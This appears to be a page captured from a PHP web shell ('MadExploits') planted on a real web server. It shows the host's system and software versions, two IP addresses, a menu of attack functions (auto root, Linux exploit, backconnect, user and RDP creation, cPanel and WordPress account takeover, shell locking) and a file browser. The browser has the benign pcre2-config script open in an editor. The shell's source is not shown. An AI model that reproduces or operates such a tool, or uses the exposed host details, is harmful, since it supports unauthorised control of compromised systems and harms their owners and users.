Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
lsphp
41.38
MB
-rwxr-xr-x
pcre2-config
2.12
KB
-rwxr-xr-x
pcre2grep
54.3
KB
-rwxr-xr-x
pcre2test
102.02
KB
-rwxr-xr-x
pear
817
B
-rwxr-xr-x
peardev
838
B
-rwxr-xr-x
pecl
754
B
-rwxr-xr-x
phar
14.54
KB
-rwxr-xr-x
phar.phar
14.54
KB
-rwxr-xr-x
php
41.44
MB
-rwxr-xr-x
php-cgi
41.34
MB
-rwxr-xr-x
php-config
3.72
KB
-rwxr-xr-x
phpdbg
42.17
MB
-rwxr-xr-x
phpize
4.41
KB
-rwxr-xr-x
zipcmp
23.72
KB
-rwxr-xr-x
zipmerge
18.34
KB
-rwxr-xr-x
ziptool
34.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pcre2-config
#!/bin/sh prefix=/usr/local exec_prefix=${prefix} exec_prefix_set=no cflags="[--cflags]" libs= if test no = yes ; then libs="[--libs16] $libs" fi if test no = yes ; then libs="[--libs32] $libs" fi if test yes = yes ; then libs="[--libs8] [--libs-posix] $libs" cflags="$cflags [--cflags-posix]" fi usage="Usage: pcre2-config [--prefix] [--exec-prefix] [--version] $libs $cflags" if test $# -eq 0; then echo "${usage}" 1>&2 exit 1 fi libR= case `uname -s` in *SunOS*) libR=" -R${exec_prefix}/lib" ;; *BSD*) libR=" -Wl,-R${exec_prefix}/lib" ;; esac libS= if test ${exec_prefix}/lib != /usr/lib ; then libS=-L${exec_prefix}/lib fi while test $# -gt 0; do case "$1" in -*=*) optarg=`echo "$1" | sed 's/[-_a-zA-Z0-9]*=//'` ;; *) optarg= ;; esac case $1 in --prefix=*) prefix=$optarg if test $exec_prefix_set = no ; then exec_prefix=$optarg fi ;; --prefix) echo $prefix ;; --exec-prefix=*) exec_prefix=$optarg exec_prefix_set=yes ;; --exec-prefix) echo $exec_prefix ;; --version) echo 10.39 ;; --cflags) if test ${prefix}/include != /usr/include ; then includes=-I${prefix}/include fi echo $includes ;; --cflags-posix) if test yes = yes ; then if test ${prefix}/include != /usr/include ; then includes=-I${prefix}/include fi echo $includes else echo "${usage}" 1>&2 fi ;; --libs-posix) if test yes = yes ; then echo $libS$libR -lpcre2-posix -lpcre2-8 else echo "${usage}" 1>&2 fi ;; --libs8) if test yes = yes ; then echo $libS$libR -lpcre2-8 else echo "${usage}" 1>&2 fi ;; --libs16) if test no = yes ; then echo $libS$libR -lpcre2-16 else echo "${usage}" 1>&2 fi ;; --libs32) if test no = yes ; then echo $libS$libR -lpcre2-32 else echo "${usage}" 1>&2 fi ;; *) echo "${usage}" 1>&2 exit 1 ;; esac shift done
Close